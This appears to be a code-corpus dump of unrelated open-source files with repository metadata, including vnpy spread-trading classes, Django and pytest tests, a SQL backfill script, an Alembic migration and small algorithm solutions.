vnpy/trader/app/spreadTrading/stBase.py
cmbclh/vnpy-1.7
ccca92139198a0d213c15fe531f37c1c702ee968
[ "MIT" ]
null
null
null
# encoding: UTF-8 from __future__ import division from datetime import datetime from math import floor import pandas as pd import numpy as np import sys sys.path.append('../') #sys.path.append('D:\\tr\\vnpy-master\\vn.trader\\DAO') sys.path.append('D:\\tr\\vnpy-1.7\\vnpy\\DAO') sys.path.append('D:\\tr\\vnpy-1.7\\vnpy\\common') import vnpy.DAO import vnpy.common from vnpy.DAO import * from vnpy.trader.vtConstant import (EMPTY_INT, EMPTY_FLOAT, EMPTY_STRING, EMPTY_UNICODE) EVENT_SPREADTRADING_TICK = 'eSpreadTradingTick.' EVENT_SPREADTRADING_POS = 'eSpreadTradingPos.' EVENT_SPREADTRADING_LOG = 'eSpreadTradingLog' EVENT_SPREADTRADING_ALGO = 'eSpreadTradingAlgo.' EVENT_SPREADTRADING_ALGOLOG = 'eSpreadTradingAlgoLog' ######################################################################## class StLeg(object): """""" #---------------------------------------------------------------------- def __init__(self): """Constructor""" self.vtSymbol = EMPTY_STRING # 代码 self.ratio = EMPTY_INT # 实际交易时的比例 self.multiplier = EMPTY_FLOAT # 计算价差时的乘数 self.payup = EMPTY_INT # 对冲时的超价tick self.bidPrice = EMPTY_FLOAT self.askPrice = EMPTY_FLOAT self.bidVolume = EMPTY_INT self.askVolume = EMPTY_INT self.longPos = EMPTY_INT self.shortPos = EMPTY_INT self.netPos = EMPTY_INT self.actleg = EMPTY_INT self.actlegPos = EMPTY_FLOAT self.passleg = EMPTY_INT self.passlegPos = EMPTY_FLOAT self.profitloss = EMPTY_FLOAT ######################################################################## class StSpread(object): """""" #---------------------------------------------------------------------- def __init__(self): """Constructor""" self.name = EMPTY_UNICODE # 名称 self.symbol = EMPTY_STRING # 代码(基于组成腿计算) self.activeLeg = None # 主动腿 self.passiveLegs = [] # 被动腿(支持多条) self.allLegs = [] # 所有腿 self.bidPrice = EMPTY_FLOAT self.askPrice = EMPTY_FLOAT self.bidVolume = EMPTY_INT self.askVolume = EMPTY_INT self.time = EMPTY_STRING self.longPos = EMPTY_INT self.shortPos = EMPTY_INT self.netPos = EMPTY_INT self.actlegLongPos = EMPTY_INT self.actlegLongValue = EMPTY_FLOAT self.actlegShortPos = EMPTY_INT self.actlegShortValue = EMPTY_FLOAT self.passlegLongPos = EMPTY_INT self.passlegLongValue = EMPTY_FLOAT self.passlegShortgPos = EMPTY_INT self.passlegShortValue = EMPTY_FLOAT self.profitloss = EMPTY_FLOAT #---------------------------------------------------------------------- def initSpread(self): """初始化价差""" # 价差最少要有一条主动腿 if not self.activeLeg: return # 生成所有腿列表 self.allLegs.append(self.activeLeg) self.allLegs.extend(self.passiveLegs) # 生成价差代码 legSymbolList = [] for leg in self.allLegs: if leg.multiplier >= 0: legSymbol = '+%s*%s' %(leg.multiplier, leg.vtSymbol) else: legSymbol = '%s*%s' %(leg.multiplier, leg.vtSymbol) legSymbolList.append(legSymbol) self.symbol = ''.join(legSymbolList) #---------------------------------------------------------------------- def calculatePrice(self): """计算价格""" # 清空价格和委托量数据 self.bidPrice = EMPTY_FLOAT self.askPrice = EMPTY_FLOAT self.askVolume = EMPTY_INT self.bidVolume = EMPTY_INT # 遍历价差腿列表 for n, leg in enumerate(self.allLegs): # 计算价格 if leg.multiplier > 0: self.bidPrice += leg.bidPrice * leg.multiplier self.askPrice += leg.askPrice * leg.multiplier else: self.bidPrice += leg.askPrice * leg.multiplier self.askPrice += leg.bidPrice * leg.multiplier # 计算报单量:floor向下取整 if leg.ratio > 0: legAdjustedBidVolume = floor(leg.bidVolume / leg.ratio) legAdjustedAskVolume = floor(leg.askVolume / leg.ratio) else: legAdjustedBidVolume = floor(leg.askVolume / abs(leg.ratio)) legAdjustedAskVolume = floor(leg.bidVolume / abs(leg.ratio)) if n == 0: self.bidVolume = legAdjustedBidVolume # 对于第一条腿,直接初始化 self.askVolume = legAdjustedAskVolume else: self.bidVolume = min(self.bidVolume, legAdjustedBidVolume) # 对于后续的腿,价差可交易报单量取较小值 self.askVolume = min(self.askVolume, legAdjustedAskVolume) # 更新时间 self.time = datetime.now().strftime('%H:%M:%S.%f')[:-3] #---------------------------------------------------------------------- def calculatePos(self): """计算持仓""" # 清空持仓数据 self.longPos = EMPTY_INT self.shortPos = EMPTY_INT self.netPos = EMPTY_INT self.actlegLongPos = EMPTY_INT self.actlegLongValue = EMPTY_FLOAT self.actlegShortPos = EMPTY_INT self.actlegShortValue = EMPTY_FLOAT self.passlegLongPos = EMPTY_INT self.passlegLongValue = EMPTY_FLOAT self.passlegShortgPos = EMPTY_INT self.passlegShortValue = EMPTY_FLOAT self.profitloss = EMPTY_FLOAT # 遍历价差腿列表 for n, leg in enumerate(self.allLegs): if leg.ratio > 0: legAdjustedLongPos = floor(leg.longPos / leg.ratio) legAdjustedShortPos = floor(leg.shortPos / leg.ratio) else: legAdjustedLongPos = floor(leg.shortPos / abs(leg.ratio)) legAdjustedShortPos = floor(leg.longPos / abs(leg.ratio)) if n == 0: self.longPos = legAdjustedLongPos self.shortPos = legAdjustedShortPos else: self.longPos = min(self.longPos, legAdjustedLongPos) self.shortPos = min(self.shortPos, legAdjustedShortPos) #计算浮动盈亏 sql = ' SELECT LONG_POSITION, LONG_POSITION*LONG_OPEN_AVG_PRICE,SHORT_POSITION,SHORT_POSITION*SHORT_OPEN_AVG_PRICE' \ ' from defer_real_hold where SYMBOL = \'%s\' and STRATAGE = \'%s\' ' % (leg.vtSymbol, self.name) #retPos = vnpy.DAO.getDataBySQL('vnpy', sql) print (u'leginfo:vtSymbol=%s,name=%s' % (leg.vtSymbol, self.name)) retPos = vnpy.DAO.getDataBySQL('vnpy', sql) # 根据以上条件查询出的默认持仓只有一条记录,目前被动腿也只有一条leg print retPos print leg print self.activeLeg,self.passiveLegs if leg == self.activeLeg: print (u'leginfo:self.askPrice=%s' % (str(self.askPrice))) self.actlegLongPos = retPos.icol(0).get_values() self.actlegLongValue = retPos.icol(1).get_values() self.actlegShortPos = retPos.icol(2).get_values() self.actlegShortValue = retPos.icol(3).get_values() print self.actlegLongPos,self.actlegLongValue,self.actlegShortPos,self.actlegShortValue #被动腿有可能有多条腿 elif leg in self.passiveLegs: self.passlegLongPos += retPos.icol(0).get_values() self.passlegLongValue += retPos.icol(1).get_values() self.passlegShortgPos += retPos.icol(2).get_values() self.passlegShortValue += retPos.icol(3).get_values() else: pass #浮动盈亏=主动腿盈亏+被动腿盈亏 self.profitloss = (self.actlegLongValue - self.actlegLongPos * leg.askPrice ) + (self.passlegShortValue - self.passlegShortgPos * leg.bidPrice) \ + (self.actlegShortValue - self.actlegShortPos * leg.bidPrice) + ( self.passlegLongValue - self.passlegLongPos * leg.askPrice) #self.profitloss = self.actlegLongPos*self.askPrice + self.actlegShortPos*self.bidPrice print (u'leginfo:self.actleg=%s,self.actlegPos=%s,self.profitloss=%s' % (str(self.actlegLongPos), str(self.actlegLongValue),str(self.profitloss))) # 计算净仓位 self.longPos = int(self.longPos) self.shortPos = int(self.shortPos) self.netPos = self.longPos - self.shortPos #wzhua 20170917 新增计算浮动盈亏 self.actlegLongPos = int(self.actlegLongPos) self.actlegLongValue = float(self.actlegLongValue) self.actlegShortPos = int(self.actlegShortPos) self.actlegShortValue = float(self.actlegShortValue) self.passlegLongPos = int(self.passlegLongPos) self.passlegLongValue = float(self.passlegLongValue) self.passlegShortgPos = int(self.passlegShortgPos) self.passlegShortValue = float(self.passlegShortValue) self.profitloss = float(self.profitloss) #---------------------------------------------------------------------- def addActiveLeg(self, leg): """添加主动腿""" self.activeLeg = leg #---------------------------------------------------------------------- def addPassiveLeg(self, leg): """添加被动腿""" self.passiveLegs.append(leg)
37.270588
158
0.551557
865
9,504
5.947977
0.210405
0.040816
0.055977
0.008163
0.35724
0.29174
0.240816
0.219825
0.205831
0.196501
0
0.004161
0.291982
9,504
255
159
37.270588
0.76044
0.101957
0
0.333333
0
0
0.054882
0.032954
0
0
0
0
0
0
null
null
0.163636
0.060606
null
null
0.042424
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
1
0
0
0
0
0
2
abfe2c1cf99654791bb342078effa2478f34e393
310
py
Python
{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/users/tests/test_models.py
nathfroech/cookiecutter-django
9568671807c24655d0c51ecef91d22fe8b550d3f
[ "BSD-3-Clause" ]
null
null
null
{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/users/tests/test_models.py
nathfroech/cookiecutter-django
9568671807c24655d0c51ecef91d22fe8b550d3f
[ "BSD-3-Clause" ]
null
null
null
{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/users/tests/test_models.py
nathfroech/cookiecutter-django
9568671807c24655d0c51ecef91d22fe8b550d3f
[ "BSD-3-Clause" ]
null
null
null
import pytest from hamcrest import assert_that, equal_to, is_ from django.conf import settings @pytest.mark.django_db def test_user_get_absolute_url(user: settings.AUTH_USER_MODEL): expected_url = '/users/{0}/'.format(user.username) assert_that(user.get_absolute_url(), is_(equal_to(expected_url)))
28.181818
69
0.790323
48
310
4.75
0.5625
0.087719
0.131579
0.157895
0
0
0
0
0
0
0
0.003597
0.103226
310
10
70
31
0.816547
0
0
0
0
0
0.035484
0
0
0
0
0
0.285714
1
0.142857
false
0
0.428571
0
0.571429
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
abffd96161e8443437fe3910d4ce59e8abc42d99
731
py
Python
tests/_test_version_greater.py
jonyboi396825/COM-Server
e4e8a1a5e9f86c1036ebb7ac3d39c20b63e7e905
[ "MIT" ]
4
2021-11-09T04:11:51.000Z
2022-01-30T01:03:16.000Z
tests/_test_version_greater.py
jonyboi396825/COM-Server
e4e8a1a5e9f86c1036ebb7ac3d39c20b63e7e905
[ "MIT" ]
55
2021-11-15T16:36:25.000Z
2022-03-10T04:48:08.000Z
tests/_test_version_greater.py
jonyboi396825/COM-Server
e4e8a1a5e9f86c1036ebb7ac3d39c20b63e7e905
[ "MIT" ]
1
2021-11-12T02:14:07.000Z
2021-11-12T02:14:07.000Z
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Version testing Don't want to run when running `pytest`, only run when something is pushed to develop branch or PR to master. """ import configparser import requests from com_server import __version__ from passive.cmp_version import Version def test_version_greater() -> None: """Tests if current version is greater than version on master branch on github""" req = requests.get( "https://raw.githubusercontent.com/jonyboi396825/COM-Server/master/setup.cfg" ) cfg = configparser.ConfigParser() cfg.read_string(req.text) master_vers = Version(cfg["metadata"]["version"]) cur_vers = Version(__version__) assert cur_vers > master_vers
23.580645
85
0.719562
99
731
5.141414
0.59596
0.027505
0
0
0
0
0
0
0
0
0
0.013267
0.175103
731
30
86
24.366667
0.830846
0.336525
0
0
0
0
0.191083
0
0
0
0
0
0.076923
1
0.076923
false
0.076923
0.307692
0
0.384615
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
1
0
0
0
0
2
2800fe4ff8f5543c36554bc37b647db2a125d9ae
390
py
Python
mp/visualize/models.py
Ecotrust/PEW-EFH
83e404fe90e957891ab2dfaad327e52346cea748
[ "Apache-2.0" ]
1
2017-09-06T14:05:48.000Z
2017-09-06T14:05:48.000Z
mp/visualize/models.py
Ecotrust/PEW-EFH
83e404fe90e957891ab2dfaad327e52346cea748
[ "Apache-2.0" ]
126
2015-01-05T19:47:52.000Z
2021-09-07T23:44:29.000Z
mp/visualize/models.py
Ecotrust/COMPASS
42ee113e4d66767300cfab0d6ce1f35847f447ed
[ "Apache-2.0" ]
null
null
null
from django.db import models from django.conf import settings from django.contrib.gis.db import models from madrona.features import register from madrona.features.models import Feature @register class Bookmark(Feature): url_hash = models.CharField(max_length=2050) class Options: verbose_name = 'Marine Planner Bookmark' form = 'visualize.forms.BookmarkForm'
27.857143
49
0.761538
50
390
5.88
0.6
0.102041
0.095238
0.122449
0
0
0
0
0
0
0
0.012384
0.171795
390
14
50
27.857143
0.897833
0
0
0
0
0
0.130435
0.071611
0
0
0
0
0
1
0
false
0
0.454545
0
0.727273
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
e608539fab23c3cf7080aa7205e16f057ed4a51c
2,132
py
Python
test/test_coloripy.py
ajshajib/coloripy
136bad593b3914a5c33dec069df8bf5a44a5815d
[ "MIT" ]
3
2020-06-14T13:12:33.000Z
2022-01-03T21:41:16.000Z
test/test_coloripy.py
ajshajib/coloripy
136bad593b3914a5c33dec069df8bf5a44a5815d
[ "MIT" ]
null
null
null
test/test_coloripy.py
ajshajib/coloripy
136bad593b3914a5c33dec069df8bf5a44a5815d
[ "MIT" ]
null
null
null
""" Tests for `coloripy` module. """ import numpy as np from math import isclose import coloripy as cp class TestColoripy(object): @classmethod def setup_class(cls): pass def test_skew_scale(self): modes = ['linear', 'square', 'cubic', 'power', 'sqrt'] vals = [0., 0.5, 1.] for mode, val in zip(modes, vals): assert isclose(cp.skew_scale(val, mode=mode), val) def test_get_cmap(self): standard = np.array([[0.23137255, 0.29803922, 0.75294118], [0.21960784, 0.41568627, 0.87058824], [0.23137255, 0.5372549, 0.97647059], [0.29019608, 0.65490196, 1.0627451 ], [0.39215686, 0.76862745, 1.12941176], [0.52941176, 0.87843137, 1.18039216], [0.67843137, 0.97647059, 1.20784314], [0.84313725, 1.0627451, 1.21568627], [1.00784314, 1.12941176, 1.21176471], [1.17254902, 1.17647059, 1.19607843], [1.32941176, 1.19607843, 1.17647059], [1.2745098 , 1.14901961, 1.03137255], [1.22745098, 1.0745098, 0.87843137], [1.18431373, 0.98431373, 0.7254902 ], [1.14117647, 0.87843137, 0.58431373], [1.09019608, 0.76078431, 0.45490196], [1.03137255, 0.63137255, 0.34901961], [0.96470588, 0.50196078, 0.26666667], [0.88627451, 0.36862745, 0.20784314], [0.8, 0.22745098, 0.17254902], [0.70588235, 0.01568627, 0.14901961]]) rgb1 = np.array([59, 76, 192]) rgb2 = np.array([180, 4, 38]) ref_point = [221., 221., 221.] cmap = cp.MshColorMap(rgb1, rgb2, ref_point=ref_point, num_bins=21).get_colormap() assert isclose(np.sum(cmap-standard), 0., abs_tol=1e-8) @classmethod def teardown_class(cls): pass
38.071429
66
0.486867
239
2,132
4.288703
0.476987
0.020488
0.023415
0
0
0
0
0
0
0
0
0.445537
0.379925
2,132
55
67
38.763636
0.329803
0.013133
0
0.093023
0
0
0.012405
0
0
0
0
0
0.046512
1
0.093023
false
0.046512
0.069767
0
0.186047
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e62704d640c5f34b51dc4894e557ad6bcb2ec7d5
1,637
py
Python
ad_hoc/name_mapper_backfill.py
Connor-R/NSBL
16615990d058d171fab4790f937846fd1f0b2ee9
[ "MIT" ]
1
2020-11-19T23:20:19.000Z
2020-11-19T23:20:19.000Z
ad_hoc/name_mapper_backfill.py
Connor-R/NSBL
16615990d058d171fab4790f937846fd1f0b2ee9
[ "MIT" ]
null
null
null
ad_hoc/name_mapper_backfill.py
Connor-R/NSBL
16615990d058d171fab4790f937846fd1f0b2ee9
[ "MIT" ]
null
null
null
from py_db import db import NSBL_helpers as helper db = db("NSBL") table_dict = {"register_batting_analytical": "a.player_name" , "register_batting_primary": "a.player_name" , "register_batting_secondary": "a.player_name" , "register_batting_splits": "a.player_name" , "register_pitching_analytical": "a.player_name" , "register_pitching_primary": "a.player_name" , "register_pitching_rates_relief": "a.player_name" , "register_pitching_rates_start": "a.player_name" , "register_pitching_secondary": "a.player_name" , "zips_defense": "a.player_name" , "zips_fangraphs_batters_counting": "a.Player" , "zips_fangraphs_batters_rate": "a.Player" , "zips_fangraphs_pitchers_counting": "a.Player" , "zips_fangraphs_pitchers_rate": "a.Player" , "zips_offense": "a.player_name" , "zips_offense_splits": "a.player_name" , "zips_pitching": "a.player_name" , "zips_pitching_splits": "a.player_name" , "mlb_prospects.fg_raw": "a.playerName" , "mlb_prospects.minorleagueball_professional": "a.full_name" , "mlb_prospects.mlb_prospects_draft": "CONCAT(a.fname, ' ', a.lname)" , "mlb_prospects.mlb_prospects_international": "CONCAT(a.fname, ' ', a.lname)" , "mlb_prospects.mlb_prospects_professional": "CONCAT(a.fname, ' ', a.lname)" } for k,v in table_dict.items(): print k qry = """ SELECT DISTINCT %s FROM %s a LEFT JOIN name_mapper nm ON (%s = nm.wrong_name) WHERE 1 AND nm.wrong_name IS NULL """ % (v, k, v) # raw_input(qry) names = db.query(qry) for name in names: helper.input_name(name[0])
32.098039
82
0.681735
218
1,637
4.770642
0.316514
0.121154
0.148077
0.146154
0.477885
0.142308
0.080769
0.080769
0.080769
0
0
0.001484
0.176542
1,637
50
83
32.74
0.77003
0.008552
0
0
0
0
0.665022
0.316471
0
0
0
0
0
0
null
null
0
0.051282
null
null
0.025641
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
e62dd8453d35731f8df986056643c1efd1e8ea57
1,257
py
Python
py/py_0105_special_subset_sums_testing.py
lcsm29/project-euler
fab794ece5aa7a11fc7c2177f26250f40a5b1447
[ "MIT" ]
null
null
null
py/py_0105_special_subset_sums_testing.py
lcsm29/project-euler
fab794ece5aa7a11fc7c2177f26250f40a5b1447
[ "MIT" ]
null
null
null
py/py_0105_special_subset_sums_testing.py
lcsm29/project-euler
fab794ece5aa7a11fc7c2177f26250f40a5b1447
[ "MIT" ]
null
null
null
# Solution of; # Project Euler Problem 105: Special subset sums: testing # https://projecteuler.net/problem=105 # # Let S(A) represent the sum of elements in set A of size n. # We shall call it a special sum set if for any two non-empty disjoint # subsets, B and C, the following properties are true: # # S(B) ≠ S(C); that is, sums of subsets cannot be equal. # If B contains more elements than C then S(B) > S(C). # For example, {81, 88, 75, 42, 87, 84, 86, 65} is not a special sum set # because 65 + 87 + 88 = 75 + 81 + 84, whereas # {157, 150, 164, 119, 79, 159, 161, 139, 158} satisfies both rules # for all possible subset pair combinations and S(A) = 1286. # # Using sets.txt (right click and "Save Link/Target As..."), a 4K text file # with one-hundred sets containing seven to twelve elements # (the two examples given above are the first two sets in the file), # identify all the special sum sets, A1, A2, ..., Ak, # and find the value of S(A1) + S(A2) + ... + S(Ak). # NOTE: This problem is related to Problem 103 and Problem 106. # # by lcsm29 http://github.com/lcsm29/project-euler import timed def dummy(n): pass if __name__ == '__main__': n = 1000 i = 10000 prob_id = 102 timed.caller(dummy, n, i, prob_id)
34.916667
76
0.67144
222
1,257
3.761261
0.608108
0.035928
0.026347
0.033533
0
0
0
0
0
0
0
0.092105
0.214002
1,257
35
77
35.914286
0.752024
0.842482
0
0
0
0
0.045977
0
0
0
0
0
0
1
0.125
false
0.125
0.125
0
0.25
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
e62e5420e9280590cadcb41f39f8b617ff3cad05
3,673
py
Python
pyserver/item/attc/annotation.py
lbouma/Cyclopath
d09d927a1e6f9e07924007fd39e8e807cd9c0f8c
[ "Apache-2.0" ]
15
2015-05-06T05:11:48.000Z
2021-12-03T14:56:58.000Z
pyserver/item/attc/annotation.py
landonb/Cyclopath
d09d927a1e6f9e07924007fd39e8e807cd9c0f8c
[ "Apache-2.0" ]
null
null
null
pyserver/item/attc/annotation.py
landonb/Cyclopath
d09d927a1e6f9e07924007fd39e8e807cd9c0f8c
[ "Apache-2.0" ]
8
2015-05-06T05:11:36.000Z
2020-11-04T05:11:22.000Z
# Copyright (c) 2006-2013 Regents of the University of Minnesota. # For licensing terms, see the file LICENSE. import conf import g from item import attachment from item import item_base from item import item_versioned from item.util.item_type import Item_Type from util_.streetaddress import ccp_stop_words log = g.log.getLogger('annotation') class One(attachment.One): item_type_id = Item_Type.ANNOTATION item_type_table = 'annotation' item_gwis_abbrev = 'anno' child_item_types = None local_defns = [ # py/psql name, deft, send?, pkey?, pytyp, reqv ('comments', None, True, False, str, 2), ] attr_defns = attachment.One.attr_defns + local_defns psql_defns = attachment.One.psql_defns + local_defns gwis_defns = item_base.One.attr_defns_reduce_for_gwis(attr_defns) __slots__ = [] + [attr_defn[0] for attr_defn in local_defns] # *** Constructor def __init__(self, qb=None, row=None, req=None, copy_from=None): g.assurt(copy_from is None) # Not supported for this class. attachment.One.__init__(self, qb, row, req, copy_from) # *** Saving to the Database # def save_core(self, qb): attachment.One.save_core(self, qb) # Save to the 'annotation' table. self.save_insert(qb, One.item_type_table, One.psql_defns) # *** class Many(attachment.Many): one_class = One __slots__ = () sql_clauses_cols_all = attachment.Many.sql_clauses_cols_all.clone() # FIXME: Maybe call a fcn. instead, like opt/argparse? Or does that # just complicate things more? #sqlc_all.inner.select_list("annot.comments") sql_clauses_cols_all.inner.shared += ( """ , annot.comments """ ) sql_clauses_cols_all.inner.join += ( """ JOIN annotation AS annot ON (gia.item_id = annot.system_id) """ ) sql_clauses_cols_all.outer.shared += ( """ , group_item.comments """ ) # *** Constructor def __init__(self): attachment.Many.__init__(self) # *** Query Builder routines # FIXME [aa] Only get gf's whose username = '' or = [current_user] # FIXME [aa] Security leak -- private annotations being sent to client # 2012.04.02: Is this really still true?? # FIXME Send where feat_type != and append feat_type == region_watched # FIXME [aa] Bug: Deleted and old version attachments being sent for no-diff # Is this a regression, or have annots always been fetches this way? # SELECT DISTINCT # lhs_stack_id AS id, # version, # comments # FROM annotation_geo AS ag # WHERE (ST_Intersects(ag.geometry, # ST_SetSRID('BOX(479932.800000 4978592.800000, # 482124.800000 4981408.800000)'::box2d, # 26915))) # def sql_apply_query_filters(self, qb, where_clause="", conjunction=""): g.assurt((not where_clause) and (not conjunction)) g.assurt((not conjunction) or (conjunction == "AND")) where_clause = attachment.Many.sql_apply_query_filters( self, qb, where_clause, conjunction) return where_clause # def sql_apply_query_filter_by_text(self, qb, table_cols, stop_words, use_outer=False): table_cols.insert(0, 'annot.comments') stop_words = ccp_stop_words.Addy_Stop_Words__Annotation return attachment.Many.sql_apply_query_filter_by_text( self, qb, table_cols, stop_words, use_outer) # *** # ***
30.355372
79
0.632181
468
3,673
4.681624
0.401709
0.021908
0.031949
0.038795
0.140575
0.127796
0.127796
0.095847
0.095847
0.052031
0
0.027975
0.270079
3,673
120
80
30.608333
0.789258
0.342499
0
0
0
0
0.022122
0
0
0
0
0.016667
0
1
0.1
false
0
0.14
0
0.56
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
1
0
0
2
e64d35a8b39dc13cbd44e4267a4f6d20a1f20bd8
746
py
Python
games/stock/environment.py
hkp1030/muzero-stock
d3acddf11afa523b81bbe1a626a50c95eb78c165
[ "MIT" ]
1
2022-01-21T21:15:49.000Z
2022-01-21T21:15:49.000Z
games/stock/environment.py
hkp1030/muzero-stock
d3acddf11afa523b81bbe1a626a50c95eb78c165
[ "MIT" ]
null
null
null
games/stock/environment.py
hkp1030/muzero-stock
d3acddf11afa523b81bbe1a626a50c95eb78c165
[ "MIT" ]
1
2022-01-21T21:30:37.000Z
2022-01-21T21:30:37.000Z
class Environment: PRICE_IDX = 4 # 종가의 위치 def __init__(self, chart_data=None, training_data=None): self.chart_data = chart_data self.training_data = training_data self.observation = None self.idx = -1 def reset(self): self.observation = None self.idx = -1 def is_done(self): if self.idx + 1 >= len(self.training_data): return True else: return False def observe(self): if self.is_done(): return None self.idx += 1 self.observation = self.training_data.iloc[self.idx] return self.observation.tolist() def get_price(self): return self.chart_data.iloc[self.idx][self.PRICE_IDX]
24.866667
61
0.591153
96
746
4.40625
0.302083
0.099291
0.07565
0.085106
0.141844
0.141844
0.141844
0
0
0
0
0.009766
0.313673
746
29
62
25.724138
0.816406
0.008043
0
0.173913
0
0
0
0
0
0
0
0
0
1
0.217391
false
0
0
0.043478
0.521739
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
e651cc7d2f10c7d86c7ce7b411ef45695942e02f
1,320
py
Python
tests/test_utils.py
SalemHarrache/dbcut
0fd60e15f3b5532c5c531923d2e9ef08ce17c935
[ "MIT" ]
16
2019-11-22T16:36:56.000Z
2022-03-12T01:49:03.000Z
tests/test_utils.py
SalemHarrache/dbcut
0fd60e15f3b5532c5c531923d2e9ef08ce17c935
[ "MIT" ]
3
2019-11-23T06:11:30.000Z
2020-06-23T13:34:04.000Z
tests/test_utils.py
SalemHarrache/dbcut
0fd60e15f3b5532c5c531923d2e9ef08ce17c935
[ "MIT" ]
4
2019-11-22T20:42:57.000Z
2022-02-23T09:10:00.000Z
import unittest from collections import OrderedDict from dbcut.utils import sorted_nested_dict def test_simple_dict_is_sorted(): data = { "c": 1, "a": 2, "b": 3, } expected = OrderedDict([("a", 2), ("b", 3), ("c", 1)]) assert expected == sorted_nested_dict(data) def test_nested_iterables_are_sorted(): data = { "c": [1, 3, 2], "a": 2, "b": (3, 1, 2), } expected = OrderedDict( [ ("a", 2), # The tuple is transformed into a list here. Still an iterable though. ("b", [1, 2, 3]), ("c", [1, 2, 3]), ] ) assert expected == sorted_nested_dict(data) def test_nested_dicts_are_sorted(): data = { "c": 1, "a": {"b": 1, "a": 2}, "b": 3, } expected = OrderedDict( [("a", OrderedDict([("a", 2), ("b", 1)])), ("b", 3), ("c", 1)] ) assert expected == sorted_nested_dict(data) def test_non_dicts_are_untouched(): data = "ravioli" assert data is sorted_nested_dict(data) data = ["r", "a", "v", "i", "o", "l", "i"] assert data is sorted_nested_dict(data) data = 42 assert data is sorted_nested_dict(data) class Custom: pass data = Custom() assert data is sorted_nested_dict(data)
22.372881
82
0.524242
172
1,320
3.837209
0.27907
0.145455
0.193939
0.212121
0.562121
0.498485
0.498485
0.401515
0.216667
0.136364
0
0.032931
0.309848
1,320
58
83
22.758621
0.691548
0.051515
0
0.391304
0
0
0.0288
0
0
0
0
0
0.152174
1
0.086957
false
0.021739
0.065217
0
0.173913
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e66228a86c2396ec8a63b8d48e9ca8a5edd9c594
502
py
Python
migrations/versions/1d09e9261d5_.py
mainulhossain/biowl
039adc96539fae25843b1fc36074a4e5e55830ec
[ "MIT" ]
null
null
null
migrations/versions/1d09e9261d5_.py
mainulhossain/biowl
039adc96539fae25843b1fc36074a4e5e55830ec
[ "MIT" ]
null
null
null
migrations/versions/1d09e9261d5_.py
mainulhossain/biowl
039adc96539fae25843b1fc36074a4e5e55830ec
[ "MIT" ]
1
2020-01-05T10:47:21.000Z
2020-01-05T10:47:21.000Z
"""empty message Revision ID: 1d09e9261d5 Revises: 40d93619b7d Create Date: 2016-12-16 11:38:41.336859 """ # revision identifiers, used by Alembic. revision = '1d09e9261d5' down_revision = '40d93619b7d' from alembic import op import sqlalchemy as sa def upgrade(): ### commands auto generated by Alembic - please adjust! ### pass ### end Alembic commands ### def downgrade(): ### commands auto generated by Alembic - please adjust! ### pass ### end Alembic commands ###
18.592593
63
0.687251
60
502
5.733333
0.616667
0.078488
0.122093
0.133721
0.372093
0.372093
0.372093
0.372093
0.372093
0.372093
0
0.129353
0.199203
502
26
64
19.307692
0.726368
0.575697
0
0.25
0
0
0.122222
0
0
0
0
0
0
1
0.25
false
0.25
0.25
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
0
0
0
2
e669828a1fd8d946f628655596de52579956c2b4
442
py
Python
Leetcode/560-Subarray_Sum.py
EdwaRen/Competitve-Programming
e8bffeb457936d28c75ecfefb5a1f316c15a9b6c
[ "MIT" ]
1
2021-05-03T21:48:25.000Z
2021-05-03T21:48:25.000Z
Leetcode/560-Subarray_Sum.py
EdwaRen/Competitve_Programming
e8bffeb457936d28c75ecfefb5a1f316c15a9b6c
[ "MIT" ]
null
null
null
Leetcode/560-Subarray_Sum.py
EdwaRen/Competitve_Programming
e8bffeb457936d28c75ecfefb5a1f316c15a9b6c
[ "MIT" ]
null
null
null
class Solution(object): def subarraySum(self, nums, k): sum = 0 res = 0 sum_history = {0:1} for i in nums: sum+=i if sum - k in sum_history: res+=sum_history[sum-k] if sum in sum_history: sum_history[sum]+=1 else: sum_history[sum] = 1 return res a = Solution() print(a.subarraySum([1, 2, 1, 2], 3))
22.1
39
0.466063
59
442
3.389831
0.389831
0.3
0.26
0.14
0
0
0
0
0
0
0
0.043478
0.427602
442
19
40
23.263158
0.747036
0
0
0
0
0
0
0
0
0
0
0
0
1
0.0625
false
0
0
0
0.1875
0.0625
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
0501d436e365fc40c731e765ab901eb50645cb02
1,489
py
Python
main.py
ytyaru/Hatena.WebSite.Login.201703040757
11ffc5549398478146a9966189e06cf535b34092
[ "CC0-1.0" ]
null
null
null
main.py
